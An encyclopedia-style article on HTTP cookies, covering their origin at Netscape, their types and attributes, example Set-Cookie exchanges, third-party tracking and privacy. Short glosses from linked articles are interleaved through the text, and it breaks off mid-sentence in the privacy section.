HTTP cookies (also called web cookies, Internet cookies, browser cookies, or simply cookies) are small blocks of
data
In the pursuit of knowledge, data (; ) is a collection of discrete Value_(semiotics), values that convey information, describing quantity, qualitative property, quality, fact, statistics, other basic units of meaning, or simply sequences of sy ...
created by a
web server while a
user is
browsing
Browsing is a kind of orienting strategy. It is supposed to identify something of relevance for the browsing organism. When used about human beings it is a metaphor taken from the animal kingdom. It is used, for example, about people browsing o ...
a
website
A website (also written as a web site) is a collection of web pages and related content that is identified by a common domain name and published on at least one web server. Examples of notable websites are Google, Facebook, Amazon, and Wi ...
and placed on the user's computer or other device by the user's
web browser
A web browser is application software for accessing websites. When a user requests a web page from a particular website, the browser retrieves its files from a web server and then displays the page on the user's screen. Browsers are used o ...
. Cookies are placed on the device used to access a website, and more than one cookie may be placed on a user's device during a session.
Cookies serve useful and sometimes essential functions on the
web. They enable web servers to store
stateful information (such as items added in the shopping cart in an
online store
Online shopping is a form of electronic commerce which allows consumers to directly buy goods or services from a seller over the Internet using a web browser or a mobile app. Consumers find a product of interest by visiting the website of the r ...
) on the user's device or to track the user's browsing activity (including clicking particular buttons,
logging in, or recording which
pages were visited in the past). They can also be used to save for subsequent use information that the user previously entered into
form fields, such as names, addresses,
password
A password, sometimes called a passcode (for example in Apple devices), is secret data, typically a string of characters, usually used to confirm a user's identity. Traditionally, passwords were expected to be memorized, but the large number of ...
s, and
payment card number
A payment card number, primary account number (PAN), or simply a card number, is the card identifier found on payment cards, such as credit cards and debit cards, as well as stored-value cards, gift cards and other similar cards. In some situat ...
s.
Authentication cookies are commonly used by web servers to
authenticate
Authentication (from ''authentikos'', "real, genuine", from αὐθέντης ''authentes'', "author") is the act of proving an assertion, such as the identity of a computer system user. In contrast with identification, the act of indicatin ...
that a user is logged in, and with which
account they are logged in. Without the cookie, users would need to authenticate themselves by logging in on each page containing sensitive information that they wish to access. The security of an authentication cookie generally depends on the security of the issuing website and the user's
web browser
A web browser is application software for accessing websites. When a user requests a web page from a particular website, the browser retrieves its files from a web server and then displays the page on the user's screen. Browsers are used o ...
, and on whether the cookie data is
encrypted
In cryptography, encryption is the process of encoding information. This process converts the original representation of the information, known as plaintext, into an alternative form known as ciphertext. Ideally, only authorized parties can deci ...
.
Security vulnerabilities
Vulnerabilities are flaws in a computer system that weaken the overall security of the device/system. Vulnerabilities can be weaknesses in either the hardware itself, or the software that runs on the hardware. Vulnerabilities can be exploited by ...
may allow a cookie's data to be read by an
attacker
In some team sports, an attacker is a specific type of player, usually involved in aggressive play. Heavy attackers are, usually, placed up front: their goal is to score the most possible points for the team. In association football, attackers a ...
, used to gain access to
user data, or used to gain access (with the user's credentials) to the website to which the cookie belongs (see
cross-site scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability m ...
and
cross-site request forgery
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced ''sea-surf'') or XSRF, is a type of malicious exploit of a website or web application where unauthorized commands are submitt ...
for examples).
Tracking cookies, and especially
third-party tracking cookies, are commonly used as ways to compile long-term records of individuals'
browsing histories a potential
privacy concern that prompted European
and U.S. lawmakers to take action in 2011.
European law requires that all websites targeting
European Union
The European Union (EU) is a supranational political and economic union of member states that are located primarily in Europe. The union has a total area of and an estimated total population of about 447million. The EU has often been de ...
member states gain "
informed consent" from users before storing non-essential cookies on their device.
Background
Origin of the name
The term ''cookie'' was coined by web-browser programmer
Lou Montulli
Louis J. Montulli II (best known as Lou Montulli) is a computer programmer who is well known for his work in producing web browsers. In 1991 and 1992, he co-authored a text web browser called Lynx, with Michael Grobe and Charles Rezac, while he w ...
. It was derived from the term ''
magic cookie
In computing, a magic cookie, or just cookie for short, is a token or short packet of data passed between communicating programs. The cookie is often used to identify a particular event or as "handle, transaction ID, or other token of agreement be ...
'', which is a packet of data a program receives and sends back unchanged, used by
Unix
Unix (; trademarked as UNIX) is a family of multitasking, multiuser computer operating systems that derive from the original AT&T Unix, whose development started in 1969 at the Bell Labs research center by Ken Thompson, Dennis Ritchie, an ...
programmers.
The term magic cookie itself derives from the
fortune cookie
A fortune cookie is a crisp and sugary cookie wafer usually made from flour, sugar, vanilla, and sesame seed oil with a piece of paper inside, a "fortune", usually an aphorism, or a vague prophecy. The message inside may also include a Chine ...
, which is a cookie with an embedded message.
History
Magic cookies were already used in computing when computer programmer
Lou Montulli
Louis J. Montulli II (best known as Lou Montulli) is a computer programmer who is well known for his work in producing web browsers. In 1991 and 1992, he co-authored a text web browser called Lynx, with Michael Grobe and Charles Rezac, while he w ...
had the idea of using them in web communications in June 1994.
At the time, he was an employee of
Netscape Communications
Netscape Communications Corporation (originally Mosaic Communications Corporation) was an American independent computer services company with headquarters in Mountain View, California and then Dulles, Virginia. Its Netscape web browser was onc ...
, which was developing an
e-commerce
E-commerce (electronic commerce) is the activity of electronically buying or selling of products on online services or over the Internet. E-commerce draws on technologies such as mobile commerce, electronic funds transfer, supply chain managem ...
application for
MCI.
Vint Cerf
Vinton Gray Cerf (; born June 23, 1943) is an American Internet pioneer and is recognized as one of " the fathers of the Internet", sharing this title with TCP/IP co-developer Bob Kahn. He has received honorary degrees and awards that include ...
and
John Klensin
John C. Klensin is a political scientist and computer science professional who is active in Internet-related issues.
Career
His career includes 30 years as a principal research scientist at MIT, including a period as INFOODS Project Coordinat ...
represented MCI in technical discussions with Netscape Communications. MCI did not want its servers to have to retain partial transaction states, which led them to ask Netscape to find a way to store that state in each user's computer instead. Cookies provided a solution to the problem of reliably implementing a
virtual shopping cart.
[Kesan, Jey; and Shah, Rajiv]
''Deconstructing Code''
, SSRN.com, chapter II.B (Netscape's cookies), Yale Journal of Law and Technology, 6, 277–389[Kristol, David; ''HTTP Cookies: Standards, privacy, and politics'', ACM Transactions on Internet Technology, 1(2), 151–198, 2001 (an expanded version is freely available a]
_arXiv:cs/0105018v1_[cs.SE]
Together_with_John_Giannandrea,_Montulli_wrote_the_initial_Netscape_cookie_specification_the_same_year._Version_0.9beta_of_Netscape_Navigator.html" ;"title="s.SE]"> arXiv:cs/0105018v1 [cs.SE]
Together with John Giannandrea, Montulli wrote the initial Netscape cookie specification the same year. Version 0.9beta of Netscape Navigator">Mosaic Netscape, released on October 13, 1994,
supported cookies.
The first use of cookies (out of the labs) was checking whether visitors to the Netscape website had already visited the site. Montulli applied for a patent for the cookie technology in 1995, which was granted in 1998. Support for cookies was integrated with
Internet Explorer
Internet Explorer (formerly Microsoft Internet Explorer and Windows Internet Explorer, commonly abbreviated IE or MSIE) is a series of graphical web browsers developed by Microsoft which was used in the Windows line of operating systems ( ...
in version 2, released in October 1995.
The introduction of cookies was not widely known to the public at the time. In particular, cookies were accepted by default, and users were not notified of their presence. The public learned about cookies after the ''
Financial Times
The ''Financial Times'' (''FT'') is a British daily newspaper printed in broadsheet and published digitally that focuses on business and economic current affairs. Based in London, England, the paper is owned by a Japanese holding company, Ni ...
'' published an article about them on February 12, 1996.
In the same year, cookies received a lot of media attention, especially because of potential privacy implications. Cookies were discussed in two U.S.
Federal Trade Commission hearings in 1996 and 1997.
The development of the formal cookie specifications was already ongoing. In particular, the first discussions about a formal specification started in April 1995 on the www-talk
mailing list. A special working group within the
Internet Engineering Task Force
The Internet Engineering Task Force (IETF) is a standards organization for the Internet and is responsible for the technical standards that make up the Internet protocol suite (TCP/IP). It has no formal membership roster or requirements and a ...
(IETF) was formed. Two alternative proposals for introducing state in HTTP transactions had been proposed by
Brian Behlendorf
Brian Behlendorf (born March 30, 1973) is an American technologist, executive, computer programmer and leading figure in the open-source software movement. He was a primary developer of the Apache Web server, the most popular web server software ...
and David Kristol respectively. But the group, headed by Kristol himself and Lou Montulli, soon decided to use the Netscape specification as a starting point. In February 1996, the working group identified third-party cookies as a considerable privacy threat. The specification produced by the group was eventually published as RFC 2109 in February 1997. It specifies that third-party cookies were either not allowed at all, or at least not enabled by default.
At this time, advertising companies were already using third-party cookies. The recommendation about third-party cookies of RFC 2109 was not followed by Netscape and Internet Explorer. RFC 2109 was superseded by RFC 2965 in October 2000.
RFC 2965 added a
Set-Cookie2
header field, which informally came to be called "RFC 2965-style cookies" as opposed to the original
Set-Cookie
header field which was called "Netscape-style cookies".
[The edbrowse documentation version 3.5 said "Note that only Netscape-style cookies are supported. However, this is the most common flavor of cookie. It will probably meet your needs." This paragraph was removed i]
later versions of the documentation
further to RFC 2965's deprecation. Set-Cookie2
was seldom used, however, and was
deprecate
In several fields, especially computing, deprecation is the discouragement of use of some terminology, feature, design, or practice, typically because it has been superseded or is no longer considered efficient or safe, without completely removing ...
d in RFC 6265 in April 2011 which was written as a definitive specification for cookies as used in the real world.
No modern browser recognizes the
Set-Cookie2
header field.
Terminology
Session cookie
A ''session cookie'' (also known as an ''in-memory cookie'', ''transient cookie'' or ''non-persistent cookie'') exists only in temporary memory while the user navigates a website.
[Microsoft Suppor]
Description of Persistent and Per-Session Cookies in Internet Explorer
Article ID 223799, 2007
Session cookies expire or are deleted when the user closes the web browser.
Session cookies are identified by the browser by the absence of an expiration date assigned to them.
Persistent cookie
A ''persistent cookie'' expires at a specific date or after a specific length of time. For the persistent cookie's lifespan set by its creator, its information will be transmitted to the server every time the user visits the website that it belongs to, or every time the user views a resource belonging to that website from another website (such as an advertisement).
For this reason, persistent cookies are sometimes referred to as ''tracking cookies'' because they can be used by advertisers to record information about a user's web browsing habits over an extended period of time. Persistent cookies are also used for reasons such as keeping users logged into their accounts on websites, to avoid re-entering login credentials at every visit.
Secure cookie
A ''secure cookie'' can only be transmitted over an encrypted connection (i.e.
HTTPS
Hypertext Transfer Protocol Secure (HTTPS) is an extension of the Hypertext Transfer Protocol (HTTP). It is used for secure communication over a computer network, and is widely used on the Internet. In HTTPS, the communication protocol is enc ...
). They cannot be transmitted over unencrypted connections (i.e.
HTTP
The Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide We ...
). This makes the cookie less likely to be exposed to cookie theft via
eavesdropping
Eavesdropping is the act of secretly or stealthily listening to the private conversation or communications of others without their consent in order to gather information.
Etymology
The verb ''eavesdrop'' is a back-formation from the noun ''eaves ...
. A cookie is made secure by adding the
Secure
flag to the cookie.
Http-only cookie
An ''http-only cookie'' cannot be accessed by client-side APIs, such as
JavaScript
JavaScript (), often abbreviated as JS, is a programming language that is one of the core technologies of the World Wide Web, alongside HTML and CSS. As of 2022, 98% of websites use JavaScript on the client side for webpage behavior, of ...
. This restriction eliminates the threat of cookie theft via
cross-site scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability m ...
(XSS). However, the cookie remains vulnerable to
cross-site tracing (XST) and
cross-site request forgery
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced ''sea-surf'') or XSRF, is a type of malicious exploit of a website or web application where unauthorized commands are submitt ...
(CSRF) attacks. A cookie is given this characteristic by adding the
HttpOnly
flag to the cookie.
Same-site cookie
In 2016
Google Chrome version 51 introduced
a new kind of cookie with attribute
SameSite
. The attribute
SameSite
can have a value of
Strict
,
Lax
or
None
.
With attribute
SameSite=Strict
, the browsers would only send cookies to a target domain that is the same as the origin domain. This would effectively mitigate
cross-site request forgery
Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced ''sea-surf'') or XSRF, is a type of malicious exploit of a website or web application where unauthorized commands are submitt ...
(CSRF) attacks.
With
SameSite=Lax
, browsers would send cookies with requests to a target domain even it is different from the origin domain, but only for ''safe'' requests such as GET (POST is unsafe) and not third-party cookies (inside iframe). Attribute
SameSite=None
would allow third-party (cross-site) cookies, however, most browsers require
secure attribute on SameSite=None cookies.
The Same-site cookie is incorporated int
a new RFC draft for "Cookies: HTTP State Management Mechanism"to update RFC 6265 (if approved).
Chrome, Firefox, Microsoft Edge all started to support Same-site cookies.
The key of rollout is the treatment of existing cookies without the SameSite attribute defined, Chrome has been treating those existing cookies as if SameSite=None, this would keep all website/applications run as before. Google intended to change that default to SameSite=Lax in February 2020,
the change would break those applications/websites that rely on third-party/cross-site cookies, but without SameSite attribute defined. Given the extensive changes for web developers and
COVID-19
Coronavirus disease 2019 (COVID-19) is a contagious disease caused by a virus, the severe acute respiratory syndrome coronavirus 2 (SARS-CoV-2). The first known case was identified in Wuhan, China, in December 2019. The disease quickly ...
circumstances, Google temporarily rolled back the SameSite cookie change.
Supercookie
A ''supercookie'' is a cookie with an origin of a
top-level domain
A top-level domain (TLD) is one of the domains at the highest level in the hierarchical Domain Name System of the Internet after the root domain. The top-level domain names are installed in the root zone of the name space. For all domains in ...
(such as
.com
) or a public suffix (such as
.co.uk
). Ordinary cookies, by contrast, have an origin of a specific domain name, such as
example.com
.
Supercookies can be a potential security concern and are therefore often blocked by web browsers. If unblocked by the browser, an attacker in control of a malicious website could set a supercookie and potentially disrupt or impersonate legitimate user requests to another website that shares the same top-level domain or public suffix as the malicious website. For example, a supercookie with an origin of
.com
, could maliciously affect a request made to
example.com
, even if the cookie did not originate from
example.com
. This can be used to fake logins or change user information.
The
Public Suffix List The Public Suffix List (PSL) is a catalog of certain Internet domain names. Entries on the list are also referred to as effective top-level domains (eTLD).
The Mozilla Foundation initiated the suffix list for the security and privacy policies of its ...
helps to mitigate the risk that supercookies pose. The Public Suffix List is a cross-vendor initiative that aims to provide an accurate and up-to-date list of domain name suffixes. Older versions of browsers may not have an up-to-date list, and will therefore be vulnerable to supercookies from certain domains.
Other uses
The term ''supercookie'' is sometimes used for tracking technologies that do not rely on HTTP cookies. Two such ''supercookie'' mechanisms were found on Microsoft websites in August 2011: cookie syncing that respawned MUID (machine unique identifier) cookies, and
ETag cookies.
Due to media attention, Microsoft later disabled this code.
In a 2021 blog post, Mozilla used the term ''supercookie'' to refer to
the use of browser cache as a means of tracking users across sites.
Zombie cookie
A ''zombie cookie'' is data and code that has been placed by a
web server on a visitor's computer or other device in a hidden location outside the visitor's
web browser
A web browser is application software for accessing websites. When a user requests a web page from a particular website, the browser retrieves its files from a web server and then displays the page on the user's screen. Browsers are used o ...
's dedicated cookie storage location, and that automatically recreates a HTTP cookie as a regular cookie after the original cookie had been deleted. The zombie cookie may be stored in multiple locations, such as
Flash Local shared object,
HTML5 Web storage, and other client-side and even server-side locations, and when absence is detected in one of the locations, the missing instance is recreated by the JavaScript code using the data stored in other locations.
Cookie wall
A cookie wall pops up on a website and informs the user of the website's cookie usage. It has no reject option, and the website is not accessible without tracking cookies.
Structure
A cookie consists of the following components:
[Jim Manico quoting Daniel Stenberg]
Real world cookie length limits
# Name
# Value
# Zero or more attributes (
name/value pairs). Attributes store information such as the cookie's expiration, domain, and flags (such as
Secure
and
HttpOnly
).
Uses
Session management
Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtual ''shopping cart'' or ''shopping basket'').
Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains a
unique session identifier (typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.
Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that that particular session identifier has been authenticated and grants the user access to its services.
Because session cookies only contain a unique session identifier, this makes the amount of personal information that a website can save about each user virtually limitless—the website is not limited to restrictions concerning how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.
Personalization
Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.
Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the
Google
Google LLC () is an American Multinational corporation, multinational technology company focusing on Search Engine, search engine technology, online advertising, cloud computing, software, computer software, quantum computing, e-commerce, ar ...
search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see.
Also,
DuckDuckGo
DuckDuckGo (DDG) is an internet search engine that emphasizes protecting searchers' privacy and avoiding the filter bubble of personalized search results. DuckDuckGo does not show search results from content farms. It uses various APIs o ...
uses cookies to allow users to set the viewing preferences like colors of the web page.
Tracking
Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the
IP address
An Internet Protocol address (IP address) is a numerical label such as that is connected to a computer network that uses the Internet Protocol for communication.. Updated by . An IP address serves two main functions: network interface ident ...
of the computer requesting the page or the
referer
In HTTP, "" (a misspelling of Referrer) is an optional HTTP header field that identifies the address of the web page (i.e., the URI or IRI), from which the resource has been requested. By checking the referrer, the server providing the new web ...
field of the
HTTP
The Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide We ...
request header, but cookies allow for greater precision. This can be demonstrated as follows:
# If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. So the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page.
# From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server not only sends the page as usual but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.
By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
Corporations exploit users' web habits by tracking cookies to collect information about buying habits. The ''
Wall Street Journal
''The Wall Street Journal'' is an American business-focused, international daily newspaper based in New York City, with international editions also available in Chinese and Japanese. The ''Journal'', along with its Asian editions, is published ...
'' found that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files.
[Rainie, Lee (2012). Networked: The New Social Operating System. p. 237] The data can then be collected and sold to bidding corporations.
Implementation
Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing
states (memory of previous events) into otherwise stateless
HTTP
The Hypertext Transfer Protocol (HTTP) is an application layer protocol in the Internet protocol suite model for distributed, collaborative, hypermedia information systems. HTTP is the foundation of data communication for the World Wide We ...
transactions. Without cookies, each retrieval of a
web page or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as
JavaScript
JavaScript (), often abbreviated as JS, is a programming language that is one of the core technologies of the World Wide Web, alongside HTML and CSS. As of 2022, 98% of websites use JavaScript on the client side for webpage behavior, of ...
(unless the cookie's
HttpOnly
flag is set, in which case the cookie cannot be modified by scripting languages).
The cookie specifications
[IETF /tools.ietf.org/html/rfc6265 HTTP State Management Mechanism, Apr, 2011Obsoletes RFC 2965] require that browsers meet the following requirements in order to support cookies:
* Can support cookies as large as 4,096
byte
The byte is a unit of digital information that most commonly consists of eight bits. Historically, the byte was the number of bits used to encode a single character of text in a computer and for this reason it is the smallest addressable uni ...
s in size.
* Can support at least 50 cookies per
domain
Domain may refer to:
Mathematics
*Domain of a function, the set of input values for which the (total) function is defined
**Domain of definition of a partial function
**Natural domain of a partial function
**Domain of holomorphy of a function
* Do ...
(i.e. per website).
* Can support at least 3,000 cookies in total.
Setting a cookie
Cookies are set using the
Set-Cookie
header field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).
As an example, the browser sends its first HTTP request for the homepage of the
www.example.org
website:
GET /index.html HTTP/1.1
Host: www.example.org
...
The server responds with two
Set-Cookie
header fields:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
...
The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first, ''theme'', is considered to be a ''session cookie'' since it does not have an
Expires
or
Max-Age
attribute. Session cookies are intended to be deleted by the browser when the browser closes. The second, ''sessionToken'', is considered to be a ''persistent cookie'' since it contains an
Expires
attribute, which instructs the browser to delete the cookie at a specific date and time.
Next, the browser sends another request to visit the
spec.html
page on the website. This request contains a
Cookie
header field, which contains the two cookies that the server instructed the browser to set:
GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
…
This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including more
Set-Cookie
header fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include a
Set-Cookie
header field with an expiration date in the past.
The value of a cookie may consist of any printable
ASCII
ASCII ( ), abbreviated from American Standard Code for Information Interchange, is a character encoding standard for electronic communication. ASCII codes represent text in computers, telecommunications equipment, and other devices. Because ...
character (
!
through
~
,
Unicode
Unicode, formally The Unicode Standard,The formal version reference is is an information technology standard for the consistent encoding, representation, and handling of text expressed in most of the world's writing systems. The standard, wh ...
\u0021
through
\u007E
) excluding and
whitespace character
In computer programming, whitespace is any character or series of characters that represent horizontal or vertical space in typography. When rendered, a whitespace character does not correspond to a visible mark, but typically does occupy an area ...
s. The name of a cookie excludes the same characters, as well as
=
, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but not implemented by browsers.
The term ''cookie crumb'' is sometimes used to refer to a cookie's name–value pair.
Cookies can also be set by scripting languages such as
JavaScript
JavaScript (), often abbreviated as JS, is a programming language that is one of the core technologies of the World Wide Web, alongside HTML and CSS. As of 2022, 98% of websites use JavaScript on the client side for webpage behavior, of ...
that run within the browser. In JavaScript, the object
document.cookie
is used for this purpose. For example, the instruction
document.cookie = "temperature=20"
creates a cookie of name ''temperature'' and value ''20''.
Cookie attributes
In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server—they only send the cookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie to the server.
Domain and Path
The
Domain
and
Path
attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the website
example.org
cannot set a cookie that has a domain of
foo.com
because this would allow the website
example.org
to control the cookies of the domain
foo.com
.
If a cookie's
Domain
and
Path
attributes are not specified by the server, they default to the domain and path of the resource that was requested.
However, in most browsers there is a difference between a cookie set from
foo.com
without a domain, and a cookie set with the
foo.com
domain. In the former case, the cookie will only be sent for requests to
foo.com
, also known as a host-only cookie. In the latter case, all subdomains are also included (for example,
docs.foo.com
).
A notable exception to this general rule is Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always sends cookies to subdomains regardless of whether the cookie was set with or without a domain.
Below is an example of some
Set-Cookie
header fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within the
docs.foo.com
subdomain:
HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
…
The first cookie,
LSID
, has no
Domain
attribute, and has a
Path
attribute set to
/accounts
. This tells the browser to use the cookie only when requesting pages contained in
docs.foo.com/accounts
(the domain is derived from the request domain). The other two cookies,
HSID
and
SSID
, would be used when the browser requests any subdomain in
.foo.com
on any path (for example
www.foo.com/bar
). The prepending dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.
Expires and Max-Age
The
Expires
attribute defines a specific date and time for when the browser should delete the cookie. The date and time are specified in the form
Wdy, DD Mon YYYY HH:MM:SS GMT
, or in the form
Wdy, DD Mon YY HH:MM:SS GMT
for values of YY where YY is greater than or equal to 0 and less than or equal to 69.
Alternatively, the
Max-Age
attribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of three
Set-Cookie
header fields that were received from a website after a user logged in:
HTTP/1.0 200 OK
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly
The first cookie,
lu
, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie,
made_write_conn
, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie,
reg_fb_gate
, has its value changed to ''deleted'', with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that cookie will only be deleted if the domain and path attributes in the
Set-Cookie
field match the values used when the cookie was created.
Internet Explorer did not support
Max-Age
.
Secure and HttpOnly
The
Secure
and
HttpOnly
attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.
The
Secure
attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via
secure/encrypted connections. However, if a web server sets a cookie with a secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user by
man-in-the-middle attack
In cryptography and computer security, a man-in-the-middle, monster-in-the-middle, machine-in-the-middle, monkey-in-the-middle, meddler-in-the-middle, manipulator-in-the-middle (MITM), person-in-the-middle (PITM) or adversary-in-the-middle (AiTM) ...
s. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.
The
HttpOnly
attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notably
JavaScript
JavaScript (), often abbreviated as JS, is a programming language that is one of the core technologies of the World Wide Web, alongside HTML and CSS. As of 2022, 98% of websites use JavaScript on the client side for webpage behavior, of ...
), and therefore cannot be stolen easily via
cross-site scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability m ...
(a pervasive attack technique).
Browser settings
Most modern browsers support cookies and allow the user to disable them. The following are common options:
* To enable or disable cookies completely, so that they are always accepted or always blocked.
* To view and selectively delete cookies using a cookie manager.
* To fully wipe all private data, including cookies.
Add-on tools for managing cookie permissions also exist.
Third-party cookie
Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called ''third-party cookies''. A third-party cookie, belongs to a domain different from the one shown in the address bar. This sort of cookie typically appears when web pages feature content from external websites, such as
banner advertisement
A web banner or banner ad is a form of advertising on the World Wide Web delivered by an ad server. This form of online advertising entails embedding an advertisement into a web page. It is intended to attract traffic to a website by linkin ...
s. This opens up the potential for
tracking
Tracking may refer to:
Science and technology Computing
* Tracking, in computer graphics, in match moving (insertion of graphics into footage)
* Tracking, composing music with music tracker software
* Eye tracking, measuring the position of t ...
the user's browsing history and is used by advertisers to
serve relevant advertisements to each user.
As an example, suppose a user visits
www.example.org
. This website contains an advertisement from
ad.foxytracking.com
, which, when downloaded, sets a cookie belonging to the advertisement's domain (
ad.foxytracking.com
). Then, the user visits another website,
www.foo.com
, which also contains an advertisement from
ad.foxytracking.com
and sets a cookie belonging to that domain (
ad.foxytracking.com
). Eventually, both of these cookies will be sent to the advertiser when loading their advertisements or visiting their website. The advertiser can then use these cookies to build up a browsing history of the user across all the websites that have ads from this advertiser, through the use of the
HTTP referer
In HTTP, "" (a misspelling of Referrer) is an optional HTTP header field that identifies the address of the web page (i.e., the URI or IRI), from which the resource has been requested. By checking the referrer, the server providing the new web ...
header field.
, some websites were setting cookies readable for over 100 third-party domains.
On average, a single website was setting 10 cookies, with a maximum number of cookies (first- and third-party) reaching over 800.
The older standards for cookies, RFC 2109
and RFC 2965, recommend that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most modern web browsers contain
privacy settings
ByPrivacy settings are "the part of a social networking website, internet browser, piece of software, etc. that allows you to control who sees information about you". With the growing prevalence of social networking services, opportunities for pri ...
that can
block
Block or blocked may refer to:
Arts, entertainment and media Broadcasting
* Block programming, the result of a programming strategy in broadcasting
* W242BX, a radio station licensed to Greenville, South Carolina, United States known as ''96.3 ...
third-party cookies, and some now block all third-party cookies by default - as of July 2020, such browsers include
Apple Safari
Safari is a web browser developed by Apple. It is built into macOS, iOS, and iPadOS, and uses Apple's open-source browser engine, WebKit, which was derived from KHTML.
Safari was introduced in Mac OS X Panther in January 2003. It was inclu ...
,
Firefox
Mozilla Firefox, or simply Firefox, is a free and open-source web browser developed by the Mozilla Foundation and its subsidiary, the Mozilla Corporation. It uses the Gecko rendering engine to display web pages, which implements current ...
,
and
Brave.
Safari allows embedded sites to use Storage Access API to request permission to set first-party cookies. In May 2020,
Google Chrome introduced new features to block third-party cookies by default in its Incognito mode for private browsing, making blocking optional during normal browsing. The same update also added an option to block first-party cookies.
Chrome plans to start blocking third-party cookies by default in late 2024.
Privacy
The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a
privacy policy
A privacy policy is a statement or legal document (in privacy law) that discloses some or all of the ways a party gathers, uses, discloses, and manages a customer or client's data. Personal information can be anything that can be used to identify ...
